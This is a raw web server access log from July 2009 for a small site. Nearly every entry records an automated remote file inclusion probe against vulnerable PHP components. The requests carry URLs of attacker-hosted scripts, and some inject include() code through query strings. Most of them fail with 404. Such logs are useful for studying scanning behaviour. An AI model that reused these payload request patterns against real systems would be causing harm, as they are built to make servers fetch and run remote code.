67.18.161.226 - - [05/Jul/2009:23:05:13 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:05:14 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:05:14 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:05:43 -0700] "GET /logs/access_090522.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:05:43 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:05:44 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:23:06:16 -0700] "GET /index.php?meio=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:06:24 -0700] "GET /logs/access_090607.log%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:06:24 -0700] "GET /logs/access_090505.log%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:23:07:48 -0700] "GET //////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 920 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:23:07:49 -0700] "GET /logs///////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 1949 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:23:07:49 -0700] "GET /logs/access_090505.log///////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:23:07:51 -0700] "GET //////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 920 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:23:07:51 -0700] "GET /logs/access_090505.log///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:23:07:51 -0700] "GET /logs///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1949 "-" "Mozilla/5.0" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:23:07:59 -0700] "GET /index.php?meio=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
87.106.179.130 - - [05/Jul/2009:23:08:16 -0700] "GET /logs/access_090607.log%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
87.106.179.130 - - [05/Jul/2009:23:08:16 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
87.106.179.130 - - [05/Jul/2009:23:08:16 -0700] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
119.93.90.155 - - [05/Jul/2009:23:10:14 -0700] "GET /logs/access_090505.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
119.93.90.155 - - [05/Jul/2009:23:10:23 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
119.93.90.155 - - [05/Jul/2009:23:10:34 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:23:11:01 -0700] "GET /logs/access_090505.log%20%20///////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:23:11:20 -0700] "GET /logs/access_090505.log%20%20///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:23:12:36 -0700] "GET /logs/access.log%20%20///////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:23:13:01 -0700] "GET /logs/access.log%20%20///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
195.34.78.110 - - [05/Jul/2009:23:17:23 -0700] "GET /logs/access_090607.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
195.34.78.110 - - [05/Jul/2009:23:17:24 -0700] "GET /logs/access_090607.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
195.34.78.110 - - [05/Jul/2009:23:17:24 -0700] "GET /logs/access_090607.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
195.34.78.110 - - [05/Jul/2009:23:17:24 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
195.34.78.110 - - [05/Jul/2009:23:17:24 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
195.34.78.110 - - [05/Jul/2009:23:17:24 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
195.34.78.110 - - [05/Jul/2009:23:17:25 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
195.34.78.110 - - [05/Jul/2009:23:17:25 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
195.34.78.110 - - [05/Jul/2009:23:17:25 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
195.34.78.110 - - [05/Jul/2009:23:17:30 -0700] "GET /logs/access_090607.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
195.34.78.110 - - [05/Jul/2009:23:17:33 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
195.34.78.110 - - [05/Jul/2009:23:17:34 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
123.143.98.5 - - [05/Jul/2009:23:18:16 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/news.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
123.143.98.5 - - [05/Jul/2009:23:18:16 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/news.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
123.143.98.5 - - [05/Jul/2009:23:18:17 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/news.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
84.201.208.50 - - [05/Jul/2009:23:22:05 -0700] "GET /phphtml.php?htmlclass_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
84.201.208.50 - - [05/Jul/2009:23:22:05 -0700] "GET /logs/access.log%20%20//phphtml.php?htmlclass_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
84.201.208.50 - - [05/Jul/2009:23:22:05 -0700] "GET /logs//phphtml.php?htmlclass_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:23:22:28 -0700] "GET /logs/access_090530.log/index.php?meio=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:23:22:29 -0700] "GET /logs/index.php?meio=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:23:23:10 -0700] "GET /logs/access_090505.log/index.php?meio=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:23:23:11 -0700] "GET /logs/index.php?meio=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:23:23:42 -0700] "GET /index.php?abg_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:23:24:10 -0700] "GET /index.php?abg_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
84.201.208.50 - - [05/Jul/2009:23:24:11 -0700] "GET /logs/access_090505.log%20%20//phphtml.php?htmlclass_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
87.106.179.130 - - [05/Jul/2009:23:26:44 -0700] "GET /logs/access_090607.log//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
218.146.231.194 - - [05/Jul/2009:23:29:06 -0700] "GET /logs/access_090113.log///administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.yeojuspa.co.kr/board/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
218.146.231.194 - - [05/Jul/2009:23:29:07 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.yeojuspa.co.kr/board/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
218.146.231.194 - - [05/Jul/2009:23:29:08 -0700] "GET /logs///administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.yeojuspa.co.kr/board/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
91.121.89.135 - - [05/Jul/2009:23:30:52 -0700] "GET /logs/access.log/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
91.121.89.135 - - [05/Jul/2009:23:30:52 -0700] "GET /logs/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
91.121.89.135 - - [05/Jul/2009:23:30:52 -0700] "GET /errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:32:09 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:32:09 -0700] "GET /include/lib.inc.php?site_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:32:10 -0700] "GET /logs//include/lib.inc.php?site_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
84.201.208.50 - - [05/Jul/2009:23:32:12 -0700] "GET /*include/write.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
84.201.208.50 - - [05/Jul/2009:23:32:12 -0700] "GET /logs/*include/write.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
84.201.208.50 - - [05/Jul/2009:23:32:12 -0700] "GET /logs/access_090607.log%20%20/*include/write.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
84.201.208.50 - - [05/Jul/2009:23:32:17 -0700] "GET /logs/access_090505.log%20%20/*include/write.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:34:55 -0700] "GET /include/lib.inc.php?site_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:34:55 -0700] "GET /logs/access_090607.log%20//include/lib.inc.php?site_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:34:56 -0700] "GET /logs//include/lib.inc.php?site_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
218.146.231.194 - - [05/Jul/2009:23:35:44 -0700] "GET /logs/access_090405.log///administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.yeojuspa.co.kr/board/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:23:35:53 -0700] "GET /logs/access_090117.log//index.php?abg_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:23:35:54 -0700] "GET /logs//index.php?abg_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:23:35:56 -0700] "GET /logs/access_090405.log//index.php?abg_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:23:35:56 -0700] "GET /logs//index.php?abg_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
84.201.208.50 - - [05/Jul/2009:23:37:07 -0700] "GET /logs/access.log//phphtml.php?htmlclass_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
84.201.208.50 - - [05/Jul/2009:23:37:44 -0700] "GET /logs/access_090505.log//phphtml.php?htmlclass_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
84.201.208.50 - - [05/Jul/2009:23:40:18 -0700] "GET /logs/access_090607.log/*include/write.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
84.201.208.50 - - [05/Jul/2009:23:40:18 -0700] "GET /logs/access_090505.log/*include/write.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
38.103.63.56 - - [05/Jul/2009:23:48:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.jainvestigation.com"
38.103.63.56 - - [05/Jul/2009:23:48:46 -0700] "GET / HTTP/1.1" 200 916 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.jainvestigation.com"
91.121.89.135 - - [05/Jul/2009:23:48:49 -0700] "GET /logs/access_090530.log%20%20/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
91.121.89.135 - - [05/Jul/2009:23:48:49 -0700] "GET /errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
91.121.89.135 - - [05/Jul/2009:23:48:49 -0700] "GET /logs/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"